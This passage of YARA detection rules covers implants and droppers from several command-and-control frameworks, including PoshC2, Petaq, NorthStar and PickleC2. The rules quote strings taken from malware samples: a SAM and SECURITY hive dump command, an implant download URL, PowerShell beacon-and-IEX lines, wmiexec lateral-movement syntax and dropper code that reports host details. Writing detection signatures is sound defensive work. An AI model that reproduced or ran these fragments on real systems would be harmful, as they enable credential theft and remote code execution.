      $s13 = "<m:MailboxSmtpAddress>**MAILBOX**</m:MailboxSmtpAddress>" fullword ascii
      $s14 = "[+] Got tasking... executing." fullword ascii
      $s15 = "<soap:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=" ascii
      $s16 = "[!] Failed to create rule '%s'" fullword ascii
      $s17 = "[!] Failed to beacon to '%s'" fullword ascii
      $s18 = "</m:GetInboxRules>" fullword ascii
      $s19 = "  </soap:Header>" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609" or
      hash.sha256(0, filesize) == "c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032" or
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("wininet.dll",  "InternetConnectA") and
      pe.imports("advapi32.dll", "LookupAccountSidA") and
      ((uint16(0) == 0x5a4d and filesize < 300KB and ( 8 of them )) or (all of them))
}


- Mike C2

import "pe"
import "hash"

rule MikeC2_DllHijack {
   meta:
      description = "MikeC2 - DllHijack.dll"
      sha256 = "28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714"
   strings:
      $s1  = "DllHijack.dll" fullword ascii
      $s2  = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s3  = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s4  = "tester" fullword ascii
      $s5  = ".rdata$voltmd" fullword ascii
      $s6  = "  </trustInfo>" fullword ascii
      $s7  = "      </requestedPrivileges>" fullword ascii
      $s8  = "      <requestedPrivileges>" fullword ascii
      $s9  = ";);.;A;a;~;" fullword ascii
      $s10 = "=K=T=]=k=t=" fullword ascii
      $s11 = "SVWj h" fullword ascii
      $s12 = "2*2K2P2i2n2{2" fullword ascii
      $s13 = "1%171}1" fullword ascii
      $s14 = "0#0/0G0W0]0t0" fullword ascii
      $s15 = "646C6L6Y6o6" fullword ascii
      $s16 = "5 535A5G5M5S5Y5_5f5m5t5{5" fullword ascii
   condition:
      hash.sha256(0, filesize) == "28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714" or
      pe.imports("kernel32.dll", "WriteProcessMemory") and
      pe.imports("kernel32.dll", "CreateToolhelp32Snapshot") and
      pe.imports("kernel32.dll", "CreateRemoteThread") and
      uint16(0) == 0x5a4d and filesize < 30KB and
      8 of them
}

rule MikeC2_MikeDrop {
   meta:
      description = "MikeC2 - MikeDrop.exe"
      sha256 = "933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424"
   strings:
      $s1  = "http://kali.host/MikeC2.exe" fullword wide
      $s2  = "MikeDrop.exe" fullword wide
      $s3  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s4  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s5  = ".NETFramework,Version=v4.7.2" fullword ascii
      $s6  = ".NET Framework 4.7.2" fullword ascii
      $s7  = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36" fullword wide
      $s8  = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s9  = "UserName: {0}" fullword wide
      $s10 = "Domain UserName: {0}" fullword wide
      $s11 = "MikeC2.Program" fullword wide
      $s12 = "MikeDrop" fullword wide
      $s13 = "      <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s14 = "DoMikeC2" fullword ascii
      $s15 = "user-agent" fullword wide
      $s16 = "Program" fullword ascii
      $s17 = "Console" fullword ascii
      $s18 = "  </trustInfo>" fullword ascii
      $s19 = "Invoke" fullword ascii
   condition:
      hash.sha256(0, filesize) == "933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424" or
      uint16(0) == 0x5a4d and filesize < 20KB and
      8 of them
}


- Nimbo C2

import "hash"
import "pe"

rule Nimbo_C2_WinBin_agent {
   meta:
      description = "Nimbo-C2 - agent.dll"
      sha256 = "46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d"
   strings:
      $x1 = "yIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"*\" publicKeyTok" ascii
      $x2 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersio" ascii
      $s3 = "@System.Drawing.dll" fullword ascii
      $s4 = "@System.dll" fullword ascii
      $s5 = "agent_execution_path_windows__config_30" fullword ascii
      $s6 = "agent_execution_path_linux__config_32" fullword ascii
      $s7 = "@unable to get interface of CorRuntimeHost" fullword ascii
      $s8 = "@System.CodeDom.Compiler.CompilerParameters" fullword ascii
      $s9 = "execute_encoded_powershell__windowsZutilsZclr_5" fullword ascii
      $s10 = "3674214126" ascii
      $s11 = "@unable to get interface of CLRRuntimeHost" fullword ascii
      $s12 = "@Ws2_32.dll" fullword ascii
      $s13 = "2969576475" ascii
      $s14 = "@GenerateExecutable" fullword ascii
      $s15 = "sleep_on_execution__config_28" fullword ascii
      $s16 = "queryProcessCycleTime" fullword ascii
      $s17 = "queryIdleProcessorCycleTime" fullword ascii
      $s18 = "@unable to start CorRuntimeHost" fullword ascii
      $s19 = "SIGSEGV: Illegal storage access. (Attempt to read from nil?)" fullword ascii
   condition:
      hash.sha256(0, filesize) == "46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d" or
      pe.imports("kernel32.dll", "VirtualProtect") and
      uint16(0) == 0x5a4d and filesize < 1000KB and
      1 of ($x*) and 4 of them
}

rule Nimbo_C2_UnixBin_agent {
   meta:
      description = "Nimbo-C2 - agent.so"
      sha256 = "9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49"
   strings:
      $s1 = "agent_execution_path_linux__config_32" fullword ascii
      $s2 = "agent_execution_path_windows__config_30" fullword ascii
      $s3 = "AWAVAUA" fullword ascii
      $s4 = "sleep_on_execution__config_28" fullword ascii
      $s5 = "SIGSEGV: Illegal storage access. (Attempt to read from nil?)" fullword ascii
      $s6 = "SIGPIPE: Pipe closed." fullword ascii
      $s7 = "reportUnhandledError__system_2855" fullword ascii
      $s8 = "reportUnhandledErrorAux__system_2752" fullword ascii
      $s9 = "getBigChunk__system_4510" fullword ascii
      $s10 = "getBottom__system_3996" fullword ascii
      $s11 = "getActiveStack__system_5401" fullword ascii
      $s12 = "cellSetGet__system_4918" fullword ascii
      $s13 = "doOperation__system_5296" fullword ascii
      $s14 = "getHugeChunk__system_4525" fullword ascii
      $s15 = "intSetGet__system_4180" fullword ascii
      $s16 = "sweep__system_5710" fullword ascii
      $s17 = "NTIhttpheaders__FbZeO4trJhT2CCJ9aLxejqw_" fullword ascii
      $s18 = "getDiscriminant__system_3619" fullword ascii
      $s19 = "getFileHandle__systemZio_228" fullword ascii
      $s20 = "getOccupiedMem__system_1936" fullword ascii
   condition:
      hash.sha256(0, filesize) == "9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49" or
      uint16(0) == 0x457f and filesize < 600KB and
      8 of them
}


- NorthStar C2

import "hash"

rule NorthStarC2 {
   meta:
      description = "NorthStarC2 - NorthstarStager.exe"
      sha256 = "f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c"
   strings:
      $s1  = "reg.exe save hklm\\sam c:\\temp\\sam.save & reg.exe save hklm\\security c:\\temp\\security.save & reg.exe save hklm\\system c:" wide
      $s2  = "  " fullword ascii
      $s3  = "SystemHealthCheck.exe" fullword wide
      $s4  = "processCommand" fullword ascii
      $s5  = "NorthstarStager.exe" fullword wide
      $s6  = "_SAMDUMP.zip" fullword wide
      $s7  = "login.php" fullword wide
      $s8  = "_getProcesses" fullword ascii
      $s9  = "bypassuac" fullword wide
      $s10 = "Probably bypassed check new connection" fullword wide
      $s11 = "samdump" fullword wide
      $s12 = "set_UseShellExecute" fullword ascii
      $s13 = "        <requestedExecutionLevel  level=\"asInvoker\" uiAccess=\"false\" />" fullword ascii
      $s14 = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />" fullword ascii
      $s15 = "uploadfile" fullword wide
      $s16 = "getjuice.php" fullword wide
      $s17 = "_samDump" fullword ascii
      $s18 = "Cmd mode enabled, all commands will be redirect to CMD. Response delay is : " fullword wide
      $s19 = "Command not found, you may need to enable CMD mode <enablecmd or enable cmd>" fullword wide
      $s20 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" fullword wide
   condition:
      hash.sha256(0, filesize) == "f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c" or
      uint16(0) == 0x5a4d and filesize < 70KB and
      8 of them
}


- Petaq C2

import "hash"

rule PetaqImplant {
   meta:
      description = "PetaqImplant - PetaqImplant.exe"
      sha256 = "8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272"
   strings:
      $x1  = "    exec cmd.exe /c dir" fullword wide
      $x2  = "    execthread cmd.exe /c dir" fullword wide
      $x3  = "    lateralmovement wmiexec domain=galaxy username=administrator password=Password3 host=10.0.0.1 command=\"powershell " fullword wide
      $x4  = "    lateralmovement wmiexec domain=DOMAIN username=USER password=PASSWORD host=REMOTEHOST command=\"COMMANDTORUN\"" fullword wide
      $s5  = "Invalid credentials error may occur if the logged on user has no access to remote server IPC$. Try this before linking 'net use " wide
      $s6  = "The process is running with the payload injected." fullword wide
      $s7  = "    exec-sharpassembly url http://127.0.0.1/test.exe" fullword wide
      $s8  = "    exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH64 T1" fullword wide
      $s9  = "    exec-shellcode url http://127.0.0.1/Shellcode.bin ARCH32 T2" fullword wide
      $s10 = "Execute a command/binary:" fullword wide
      $s11 = "* link smb://192.168.1.1/NamedPipeName" fullword wide
      $s12 = "Setting the startup information for the process to inject." fullword wide
      $s13 = "    download c:\\windows\\temp\\1.txt" fullword wide
      $s14 = "Execute Shellcode:" fullword wide
      $s15 = "Pushing the payload to the process memory." fullword wide
      $s16 = "Compile & Execute .NET source code:" fullword wide
      $s17 = "PetaqImplant.exe" fullword wide
      $s18 = "* transmit SESSIONID COMMAND" fullword wide
      $s19 = "shellcode" fullword ascii
      $s20 = "ExecShellcodeBridge" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272" or
      uint16(0) == 0x5a4d and filesize < 200KB and
      1 of ($x*) and 4 of them
}


- PickleC2

import "hash"

rule PickleC2 {
   meta:
      description = "PickleC2 - powershell.ps1"
      sha256 = "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1"
   strings:
      $s1  = "function Execute($key,$ip,$port,$implant_name,$sleep_time){" fullword ascii
      $s2  = "Execute $key $ip $port $implant_name $sleep_time" fullword ascii
      $s3  = "    $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList | Select IPAddressToString | findstr \".*.*" ascii
      $s4  = "        $process.startInfo.UseShellExecute = $false" fullword ascii
      $s5  = "    $Hostname = \"Machine_Name(\"+ [System.Net.Dns]::GetHostByName($NULL).Hostname + \")\"" fullword ascii
      $s6  = "            $data = (Invoke-WebRequest -UseBasicParsing -Uri $file_download -Method 'POST').Content" fullword ascii
      $s7  = "    $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" fullword ascii
      $s8  = "    $LocalIPs = \"LocalIPs(\" + (([System.Net.Dns]::GetHostByName($NULL).AddressList | Select IPAddressToString | findstr \".*.*" ascii
      $s9  = "        $process.StandardOutput.ReadToEnd() + $process.StandardError.ReadToEnd() " fullword ascii
      $s10 = "            $cmd = \"cmd.exe\"" fullword ascii
      $s11 = "    $file_download = \"ht\" + 'tp:' + \"//\" + $ip + \":$port/task/$implant_name/file.ret\"" fullword ascii
      $s12 = "        elseif ($binary -eq \"execute\"){" fullword ascii
      $s13 = " -join ',').replace('IPAddressToString,-----------------,','').replace(\" \",\"\") + \")\"" fullword ascii
      $s14 = "            $cmd = \"powershell.exe\"" fullword ascii
      $s15 = "function Decrypt-String($key, $encryptedStringWithIV) {" fullword ascii
      $s16 = "        $task_req = (Invoke-WebRequest -UseBasicParsing -Uri $task -Method 'GET').Content" fullword ascii
      $s17 = "    $task = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/task/$implant_name\"" fullword ascii
      $s18 = "    $result = \"ht\" + \"tp:\" + \"//\" + $ip + \":$port/result/$implant_name\"" fullword ascii
      $s19 = "        $process.startInfo.RedirectStandardError = $true" fullword ascii
      $s20 = "            $results = Encrypt-String $key \"Downloaded\"" fullword ascii
   condition:
      hash.sha256(0, filesize) == "3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1" or
      uint16(0) == 0x7566 and filesize < 20KB and
      8 of them
}


- Posh C2

import "hash"
import "pe"

rule PoshC2_Csc {
   meta:
      description = "PoshC2 - csc.exe"
      sha256 = "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa"
   strings:
      $s1  = "csc.exe" fullword ascii
      $s2  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s3  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s4  = "Microsoft.CodeAnalysis" fullword ascii
      $s5  = "lpThreadId" fullword ascii
      $s6  = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s7  = "      <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s8  = "lpAddress" fullword ascii
      $s9  = "Protection" fullword ascii
      $s10 = "Program" fullword ascii
      $s11 = "lpStartAddress" fullword ascii
      $s12 = "RefSafetyRulesAttribute" fullword ascii
      $s13 = "flNewProtect" fullword ascii
      $s14 = "lpflOldProtect" fullword ascii
      $s15 = "  </trustInfo>" fullword ascii
      $s16 = "EmbeddedAttribute" fullword ascii
      $s17 = "dwStackSize" fullword ascii
      $s18 = "#REPLACEME64#" fullword wide
      $s19 = "#REPLACEME32#" fullword wide
      $s20 = "System.Runtime.CompilerServices" fullword ascii
      $s21 = "FromBase64String" fullword ascii
   condition:
      hash.sha256(0, filesize) == "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa" or
      uint16(0) == 0x5a4d and filesize < 20KB and
      8 of them
}

rule PoshC2_DynamicCode {
   meta:
      description = "PoshC2 - DynamicCode.exe"
      sha256 = "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f"
   strings:
      $s1  = "DynamicCode.exe" fullword ascii
      $s2  = "Dynamic Code executed successfully" fullword wide
      $s3  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s4  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s5  = "Microsoft.CodeAnalysis" fullword ascii
      $s6  = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s7  = "      <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s8  = "Program" fullword ascii
      $s9  = "Console" fullword ascii
      $s10 = "RefSafetyRulesAttribute" fullword ascii
      $s11 = "  </trustInfo>" fullword ascii
      $s12 = "EmbeddedAttribute" fullword ascii
      $s13 = "PoshC2DynamicCode" fullword ascii
      $s14 = "System.Runtime.CompilerServices" fullword ascii
      $s15 = "System" fullword ascii
      $s16 = "      </requestedPrivileges>" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f" or
      uint16(0) == 0x5a4d and filesize < 10KB and
      8 of them
}

rule PoshC2_Fcomm {
   meta:
      description = "PoshC2 - fcomm.exe"
      sha256 = "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c"
   strings:
      $s1  = "fcomm.exe" fullword ascii
      $s2  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s3  = "ParseCommandLineArgs" fullword ascii
      $s4  = "run-dll-background" fullword wide
      $s5  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s6  = "HostInfo" fullword ascii
      $s7  = "GetCurrentTasking" fullword ascii
      $s8  = "objContents" fullword ascii
      $s9  = "get_Actioned" fullword ascii
      $s10 = "CreateEncryptionAlgorithm" fullword ascii
      $s11 = "run-dll" fullword wide
      $s12 = "run-exe Core.Program Core " fullword wide
      $s13 = "initialised" fullword ascii
      $s14 = "loadmodule" fullword wide
      $s15 = "[!] This is not implemented yet in FComm implant types." fullword wide
      $s16 = "Microsoft.CodeAnalysis" fullword ascii
      $s17 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s18 = "SafeFileRead" fullword ascii
      $s19 = "FCommConnect" fullword ascii
      $s20 = "GzipCompress" fullword ascii
   condition:
      hash.sha256(0, filesize) == "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c" or
      uint16(0) == 0x5a4d and filesize < 40KB and
      8 of them
}

rule PoshC2_Pbind {
   meta:
      description = "PoshC2 - pbind.exe"
      sha256 = "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383"
   strings:
      $s1  = "pbind.exe" fullword ascii
      $s2  = "[+] Running task in background, run get-bg to get background output." fullword wide
      $s3  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s4  = "ParseCommandLineArgs" fullword ascii
      $s5  = "run-dll-background" fullword wide
      $s6  = "[*] Only run one task in the background at a time per implant." fullword wide
      $s7  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s8  = "#REPLACEPBINDPIPENAME#" fullword wide
      $s9  = "CreateEncryptionAlgorithm" fullword ascii
      $s10 = "run-dll" fullword wide
      $s11 = "run-exe Core.Program Core " fullword wide
      $s12 = "$[-] Cannot read from pipe" fullword wide
      $s13 = "loadmodule" fullword wide
      $s14 = "[-] No output" fullword wide
      $s15 = "Microsoft.CodeAnalysis" fullword ascii
      $s16 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s17 = "GzipCompress" fullword ascii
      $s18 = "#REPLACEKEY#" fullword wide
      $s19 = "Error loading modules {0}" fullword wide
      $s20 = "run-exe-background" fullword wide
      $s21 = "Invoke" fullword wide
   condition:
      hash.sha256(0, filesize) == "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383" or
      uint16(0) == 0x5a4d and filesize < 40KB and
      8 of them
}

rule PoshC2_Sharp_Powershell_Runner {
   meta:
      description = "PoshC2 Sharp_Powershell_Runner.exe"
      sha256 = "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259"
   strings:
      $s1  = "Sharp_Powershell_Runner.exe" fullword ascii
      $s2  = "basepayload" fullword ascii
      $s3  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s4  = "get_SessionStateProxy" fullword ascii
      $s5  = "  <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" fullword ascii
      $s6  = "get_PSVariable" fullword ascii
      $s7  = "Sharp_Powershell_Runner" fullword ascii
      $s8  = "InvokeAutomation" fullword ascii
      $s9  = "Microsoft.CodeAnalysis" fullword ascii
      $s10 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" fullword ascii
      $s11 = "DllBaseAddress" fullword ascii
      $s12 = "RunspaceInvoke" fullword ascii
      $s13 = "      <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s14 = "$o = IEX $c | Out-String" fullword wide
      $s15 = "Program" fullword ascii
      $s16 = "Encoding" fullword ascii
      $s17 = "RefSafetyRulesAttribute" fullword ascii
      $s18 = "  </trustInfo>" fullword ascii
      $s19 = "EmbeddedAttribute" fullword ascii
      $s20 = "baseAddr" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259" or
      uint16(0) == 0x5a4d and filesize < 20KB and
      8 of them
}

rule PoshC2_Dropper {
   meta:
      description = "PoshC2 - dropper.exe"
      sha256 = "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4"
   strings:
      $s1  = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s2  = " Type Descriptor'" fullword ascii
      $s3  = "operator co_await" fullword ascii
      $s4  = "operator<=>" fullword ascii
      $s5  = ".data$rs" fullword ascii
      $s6  = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
      $s7  = " Class Hierarchy Descriptor'" fullword ascii
      $s8  = " Base Class Descriptor at (" fullword ascii
      $s9  = " Complete Object Locator'" fullword ascii
      $s10 = "__swift_3" fullword ascii
      $s11 = "__swift_2" fullword ascii
      $s12 = ".rdata$voltmd" fullword ascii
      $s13 = "xWI96tRI" fullword ascii
      $s14 = " delete[]" fullword ascii
      $s15 = "__swift_1" fullword ascii
      $s16 = "vKfffff" fullword ascii
      $s17 = "D$0@8{" fullword ascii
      $s18 = "api-ms-win-core-file-l1-2-4" fullword wide
      $s19 = "api-ms-win-core-file-l1-2-2" fullword wide
      $s20 = " delete" fullword ascii
   condition:
      hash.sha256(0, filesize) == "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4" or
      pe.sections[4].name == "_RDATA" and
      pe.imports("kernel32.dll", "WriteProcessMemory") and
      pe.imports("kernel32.dll", "CreateRemoteThread") and
      pe.imports("kernel32.dll", "OpenProcess") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      uint16(0) == 0x5a4d and filesize < 300KB and
      8 of them
}

rule PoshC2_DotNet2JS {
   meta:
      description = "PoshC2 - DotNet2JS.js"
      sha256 = "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53"
   strings:
      $s1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s4 = "AAAAAAAAAAAAAEAAAE" ascii
      $s5 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii
      $s6 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAB" ascii
      $s7 = "AAAAAAAAAAAAAAAAAAAAAAAAB" ascii
      $s8 = "AAAAAAAAAAD" ascii
      $s9 = "AAAAAAAAAEA" ascii
      $s10 = "AAAAAAAAAAAAAAAAAAAAAAAAAAABD" ascii
      $s11 = "AADAAAABAAAA" ascii
      $s12 = "AAAAAAAAAAAAAAAAAAAAAcC0AAAAAAAB" ascii
      $s13 = "ADAAAAA4AA" ascii
      $s14 = "AAAAAAAAAAAAAE4A" ascii
      $s15 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA" ascii
      $s16 = "AABAACAAAEAA" ascii
      $s17 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA" ascii
      $s18 = "function dbg(s) {WScript.Echo(s);}" fullword ascii
      $s19 = "var ba = enc.GetBytes_4(b);" fullword ascii
      $s20 = "var length = enc.GetByteCount_2(b);" fullword ascii
   condition:
      hash.sha256(0, filesize) == "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53" or
      uint16(0) == 0x6176 and filesize < 30KB and
      8 of them
}

rule PoshC2_Stage2core {
   meta:
      description = "PoshC2 - stage2core.so"
      sha256 = "e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c"
   strings:
      $x1  = "SSL - Processing of the ClientKeyExchange handshake message failed in DHM / ECDH Read Public" fullword ascii
      $x2  = "SSL - Processing of the ServerKeyExchange handshake message failed" fullword ascii
      $x3  = "Error running command on shell - " fullword ascii
      $x4  = "SSL - Processing of the ClientKeyExchange handshake message failed" fullword ascii
      $s5  = "SSL - Processing of the ClientKeyExchange handshake message failed in DHM / ECDH Calculate Secret" fullword ascii
      $s6  = "SSL - Processing of the compression / decompression failed" fullword ascii
      $s7  = "SSL - Processing of the NewSessionTicket handshake message failed" fullword ascii
      $s8  = "PKCS12 - Given private key password does not allow for correct decryption" fullword ascii
      $s9  = "PKCS5 - Given private key password does not allow for correct decryption" fullword ascii
      $s10 = "PK - Given private key password does not allow for correct decryption" fullword ascii
      $s11 = "PEM - Given private key password does not allow for correct decryption" fullword ascii
      $s12 = "NET - Failed to get an IP address for the given hostname" fullword ascii
      $s13 = "Error reading private key %s - mbedTLS: (-0x%04X) %s" fullword ascii
      $s14 = "PK - Type mismatch, eg attempt to encrypt with an ECDSA key" fullword ascii
      $s15 = "SSL - Processing of the ServerHello handshake message failed" fullword ascii
      $s16 = "RSA - The private key operation failed" fullword ascii
      $s17 = "SSL - Processing of the ChangeCipherSpec handshake message failed" fullword ascii
      $s18 = "SSL - Processing of the Finished handshake message failed" fullword ascii
      $s19 = "RSA - The public key operation failed" fullword ascii
      $s20 = "SSL - Processing of the ServerHelloDone handshake message failed" fullword ascii
   condition:
      hash.sha256(0, filesize) == "e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c" or
      uint16(0) == 0x457f and filesize < 4000KB and
      1 of ($x*) and 4 of them
}

rule PoshC2_DropperPs1 {
   meta:
      description = "PoshC2 - dropper.ps1"
      sha256 = "a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992"
   strings:
      $s1  = "$primern = (Get-Webclient -Cookie $pp).downloadstring($script:s)" fullword ascii
      $s2  = "if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add(\"Host\",$h)}" fullword ascii
      $s3  = "$procname = (Get-Process -id $pid).ProcessName" fullword ascii
      $s4  = "$o=\"$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;$procname;#REPLACEURLID#\"" fullword ascii
      $s5  = "} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, \"SessionID=$Cookie\") }" fullword ascii
      $s6  = "$getcreds = new-object system.management.automation.PSCredential $username,$PSS;" fullword ascii
      $s7  = "$wc.Headers.Add(\"User-Agent\",\"#REPLACEUSERAGENT#\")" fullword ascii
      $s8  = "$PSS = ConvertTo-SecureString $password -AsPlainText -Force;" fullword ascii
      $s9  = "$wp.Credentials = $getcreds;" fullword ascii
      $s10 = "{$a.Key = [System.Convert]::FromBase64String($key)}" fullword ascii
      $s11 = "if ($username -and $password) {" fullword ascii
      $s12 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]" ascii
      $s13 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]" ascii
      $s14 = "$d = (Get-Date -Format \"yyyy-MM-dd\");" fullword ascii
      $s15 = "if ($key.getType().Name -eq \"String\")" fullword ascii
      $s16 = "$password = \"#REPLACEPROXYPASS#\"" fullword ascii
      $s17 = "#REPLACEPROXYCOMMAND#" fullword ascii
      $s18 = "$wc = New-Object System.Net.WebClient;" fullword ascii
      $s19 = "$e = $a.CreateEncryptor()" fullword ascii
      $s20 = "elseif($h){$script:s=\"https://$($h)#REPLACECONNECT#\";$script:sc=\"https://$($h)\"}" fullword ascii
   condition:
      hash.sha256(0, filesize) == "a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992" or
      uint16(0) == 0x5223 and filesize < 10KB and
      8 of them
}

rule PoshC2_DropperPy {
   meta:
      description = "PoshC2 - dropper.py"
      sha256 = "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7"
   strings:
      $s1  = "if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" fullword ascii
      $s2  = "if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" fullword ascii
      $s3  = "if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua})" fullword ascii
      $s4  = "else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" fullword ascii
      $s5  = "else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" fullword ascii
      $s6  = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid))" fullword ascii
      $s7  = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid))" fullword ascii
